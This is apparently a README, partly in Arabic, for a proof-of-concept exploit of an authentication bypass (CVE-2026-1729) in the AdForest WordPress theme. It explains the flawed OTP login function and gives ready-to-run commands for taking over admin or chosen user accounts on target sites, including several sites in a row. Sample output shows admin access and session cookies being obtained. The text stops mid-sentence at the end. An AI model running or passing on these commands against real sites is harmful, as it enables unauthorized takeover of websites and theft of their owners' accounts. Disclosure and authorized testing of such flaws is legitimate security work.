
قالب AdForest لـ WordPress عرضة لثغرة تجاوز المصادقة في جميع الإصدارات، بما في ذلك 6.0.12. ويعود السبب إلى أن الإضافة لا تتحقق بشكل صحيح من هوية المستخدم قبل مصادقته عبر الدالة 'sb_login_user_with_otp_fun'. وهذا يتيح للمهاجمين غير المصادقين تسجيل الدخول، بما في ذلك حساب المسؤول.
إثبات مفهوم بسيط لثغرة CVE-2026-1729 (PoC) - ثغرة تجاوز المصادقة في قالب AdForest لـ WordPress. من تأليف f3ds cr3w est 2oo2 blog
requestspip install requests
python poc/exploit.py https://target-site.com
python poc/exploit.py https://target-site.com --user-id 2
# استغلال المسؤول الافتراضي (معرف المستخدم 1)
python poc/exploit.py https://example.com
# استغلال حساب مستخدم محدد
python poc/exploit.py https://example.com --user-id 5
# اختبار أهداف متعددة
python poc/exploit.py https://site1.com
python poc/exploit.py https://site2.com --user-id 3
CVE-2026-1729 - AdForest WordPress Authentication Bypass
=======================================================
WARNING: For authorized testing only!
=======================================================
[+] Target: https://example.com
[+] Targeting user ID: 1
[+] Sending exploit to: https://example.com/wp-admin/admin-ajax.php
[+] SUCCESS! Admin access granted
[+] Admin URL: https://example.com/wp-admin/
[+] Session cookies: {'wp-settings-time-1': '1234567890', 'wordpress_logged_in_...': '...'}
[+] Logged in as: admin
🎯 Exploit completed successfully!
You now have admin access to the WordPress site.
/wp-admin/إذا فشل الاستغلال: